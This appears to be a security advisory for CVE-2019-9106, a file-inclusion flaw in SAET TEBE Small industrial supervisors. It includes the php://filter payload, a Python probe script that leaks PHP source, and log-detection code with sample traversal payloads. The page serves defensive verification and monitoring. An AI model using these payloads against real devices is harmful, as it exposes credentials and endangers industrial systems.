CVE-2019-9106

9.8 CRITICAL

📋 TL;DR

A path traversal flaw in the WebApp interface of SAET Impianti Speciali TEBE Small supervisor devices lets unauthenticated remote attackers include, and therefore execute, local PHP files through the menu parameter. Wrapping the included path in php://filter/convert.base64-encode returns the target file base64-encoded instead of executing it, so attackers can read PHP source (demonstrated against index.php) together with any configuration or credentials it contains. Affects TEBE Small 05.01 build 1137 with WebApp v04.68.

💻 Affected Systems

Products:
  • SAET Impianti Speciali TEBE Small Supervisor
Versions: TEBE Small 05.01 build 1137 with WebApp v04.68
Operating Systems: Embedded/Proprietary OS on SAET devices
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web interface component of the industrial supervisor device. The flaw is in the PHP file inclusion mechanism: the menu parameter is passed to an include without being restricted to known menu files, so it accepts traversal sequences and PHP stream wrappers.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Inclusion and execution of attacker-chosen local PHP files, escalating to full device compromise: credential theft, persistent device takeover and manipulation of the industrial systems the supervisor controls.

🟠 Likely Case

Disclosure of PHP source code, and with it configuration files and any credentials embedded in web application files, read without authentication via the php://filter wrapper.

🟢 If Mitigated

Limited impact when network segmentation and access controls keep the web interface unreachable from untrusted networks.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable without authentication and affects web interfaces that may be exposed to the internet.
🏢 Internal Only: HIGH - Even internally, the vulnerability allows attackers with network access to compromise the device and potentially pivot to other systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is demonstrated with a single crafted URL: setting the menu parameter to a php://filter wrapper is enough to read PHP source. No authentication is required and no special tooling is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

Contact SAET Impianti Speciali for firmware updates or security patches. Check their website for updated versions of TEBE Small software.

🔧 Temporary Workarounds

Network Segmentation (Applies to: all)

Isolate SAET TEBE Small devices from untrusted networks and the internet

Access Control Lists (Applies to: all)

Implement strict firewall rules to limit access to the web interface

🧯 If You Can't Patch

  • Implement network segmentation to isolate affected devices in a separate VLAN, and restrict reachability of the web interface to the few operator hosts that need it
  • Deploy a web application firewall (WAF) in front of the interface with rules that block PHP stream wrappers (php://, data://, expect://) and directory traversal (../) in the menu parameter; match on the URL-decoded value, since a rule that only looks for the literal string php://filter is defeated by URL encoding or by a different filter chain

🔍 How to Verify

Check if Vulnerable:

Request the WebApp with the menu parameter set to the payload from the advisory, menu=php://filter/convert.base64-encode/resource=index.php, and inspect the response body. A long base64 string that decodes to text beginning with <?php is the source of index.php and confirms the flaw (the filter wrapper only returns the file; a plain include of the same path would execute it).

Check Version:

Check the web interface login page or device information page for version details and compare them with the affected build, TEBE Small 05.01 build 1137 with WebApp v04.68.

Verify Fix Applied:

Repeat the request and confirm that the response no longer contains base64-encoded PHP source; also confirm that a menu value containing ../ or another wrapper scheme is rejected rather than included.
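The verification procedure above, as an added example that is not code from the original page or from SAET Impianti Speciali: it builds the advisory's probe URL and then decides from a response body whether base64-encoded PHP source came back. The script path /index.php that carries the menu parameter, and plain HTTP, are assumptions; the advisory names only the parameter and the payload. The sample response bodies are constructed, not captured from a device.

```python
"""Probe for the CVE-2019-9106 php://filter payload and check the response.

Added example, not code from the original page or from SAET Impianti Speciali.
Assumptions (not in the advisory): the WebApp script that reads the `menu`
parameter is /index.php, and the device answers on plain HTTP.
"""
import base64
import binascii
import re
import urllib.parse
import urllib.request
from typing import Dict, Optional

# The advisory's payload: php://filter with convert.base64-encode makes
# include() return the target file base64-encoded instead of executing it,
# so the PHP source ends up in the HTML body.
PAYLOAD = "php://filter/convert.base64-encode/resource={resource}"


def build_probe_url(base_url: str, resource: str = "index.php",
                    script: str = "/index.php") -> str:
    """Build the probe URL; `script` is the assumed include sink."""
    menu = PAYLOAD.format(resource=resource)
    query = urllib.parse.urlencode({"menu": menu}, safe="/:=")
    return f"{base_url.rstrip('/')}{script}?{query}"


# A base64 run long enough to be file content rather than a token or hash.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def extract_php_source(body: bytes) -> Optional[str]:
    """Return decoded PHP source if the body carries a base64 blob that
    decodes to a PHP file, otherwise None."""
    for match in B64_RUN.finditer(body):
        token = match.group(0)
        token += b"=" * (-len(token) % 4)          # repair missing padding
        try:
            decoded = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if decoded.lstrip().startswith(b"<?php"):
            return decoded.decode("utf-8", errors="replace")
    return None


def check_response(body: bytes) -> Dict[str, object]:
    """Classify one response body: vulnerable if PHP source was leaked."""
    source = extract_php_source(body)
    return {"vulnerable": source is not None, "source": source}


def probe(base_url: str, timeout: float = 10.0) -> Dict[str, object]:
    """Live check (not exercised here): fetch the probe URL and classify it."""
    url = build_probe_url(base_url)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return check_response(resp.read())


# Constructed sample responses (not captured from a real device).
SAMPLE_PHP = b"<?php\n// constructed sample, not the real TEBE source\necho 'ok';\n"
VULNERABLE_BODY = b"<html><body>" + base64.b64encode(SAMPLE_PHP) + b"</body></html>"
FIXED_BODY = b"<html><body>Invalid menu</body></html>"

if __name__ == "__main__":
    print(build_probe_url("http://192.0.2.10"))
    print("vulnerable sample:", check_response(VULNERABLE_BODY)["vulnerable"])
    print("fixed sample:", check_response(FIXED_BODY)["vulnerable"])
```

Run `probe("http://<device>")` against a device once the fix is applied as well: a patched interface should return neither the base64 blob nor the raw PHP, and `check_response` then reports `vulnerable: False`.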

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests containing 'php://filter' or 'convert.base64-encode' in URL parameters, including URL-encoded forms such as 'php%3A%2F%2Ffilter'
  • Requests whose menu parameter carries a file path, a ../ sequence or a stream wrapper scheme rather than a menu identifier

Network Indicators:

  • HTTP requests with PHP wrapper or traversal payloads in the menu parameter sent to the device web interface

SIEM Query:

(http.url:*php://filter* OR http.url:*php%3A%2F%2F* OR http.url:*convert.base64-encode*) AND dst_ip:[DEVICE_IP]

Match on the URL-decoded request where the SIEM supports it; a literal-string match misses encoded payloads and other php://filter chains.
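The log and SIEM indicators above, turned into detection logic as an added example (not code from the original page or the vendor). It assumes the device, or a reverse proxy in front of it, writes Apache/nginx combined-format access logs; the log lines it scans are constructed for the example. Unlike the literal-string SIEM query it decodes each request first, so encoded and double-encoded payloads, other php://filter chains and plain ../ traversal in the menu parameter are all flagged.

```python
"""Flag CVE-2019-9106 exploitation attempts in web-server access logs.

Added example, not from the original page or from the vendor. It assumes the
device (or a reverse proxy in front of it) writes Apache/nginx combined-format
access logs; the sample lines below are constructed, not captured traffic.
"""
import re
from typing import Dict, Iterable, List
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators, matched on the URL-decoded request so that encoded payloads
# (php%3A%2F%2Ffilter) do not slip past a literal-string rule:
#   - the advisory's php:// wrapper, plus other stream wrappers that reach
#     the same include() sink
#   - php://filter chains (convert.base64-encode is the advisory's; rot13,
#     iconv and decode variants serve the same purpose)
#   - classic directory traversal in the menu value
WRAPPER_RE = re.compile(r"(php|data|expect|phar)://", re.I)
FILTER_RE = re.compile(r"convert\.base64-(en|de)code|string\.rot13|convert\.iconv", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded) to defeat double encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target: str) -> List[str]:
    """Return indicator labels for one request target, empty if benign."""
    decoded = fully_decode(target)
    hits: List[str] = []
    if WRAPPER_RE.search(decoded):
        hits.append("php-wrapper")
    if FILTER_RE.search(decoded):
        hits.append("filter-chain")
    if TRAVERSAL_RE.search(decoded):
        hits.append("traversal")
    # The sink named on the page is the menu parameter; record when the
    # suspicious value is carried there.
    if hits and "menu" in parse_qs(urlsplit(decoded).query):
        hits.append("menu-param")
    return hits


def scan_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Parse combined-format lines and keep those with indicators."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip it
        hits = classify(m["target"])
        if hits:
            findings.append({
                "src": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "target": m["target"], "indicators": hits,
            })
    return findings


def by_source(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged requests per source address for triage."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


# Constructed sample log (not real traffic). Three probes from one source
# (literal, URL-encoded rot13 variant, traversal) and two benign requests.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2019:14:02:11 +0000] "GET /index.php?menu=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2019:14:02:15 +0000] "GET /index.php?menu=php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3Dindex.php HTTP/1.1" 200 3310',
    '198.51.100.7 - - [10/Mar/2019:14:02:20 +0000] "GET /index.php?menu=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1740',
    '203.0.113.4 - - [10/Mar/2019:14:05:02 +0000] "GET /index.php?menu=home HTTP/1.1" 200 8800',
    '203.0.113.4 - - [10/Mar/2019:14:05:03 +0000] "GET /static/app.css HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["src"], f["time"], f["status"], f["indicators"], f["target"])
    print(by_source(scan_log(SAMPLE_LOG)))
```

A 200 status on a flagged request is the line to escalate: it means the include ran (or the filter wrapper returned the file) rather than being rejected.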
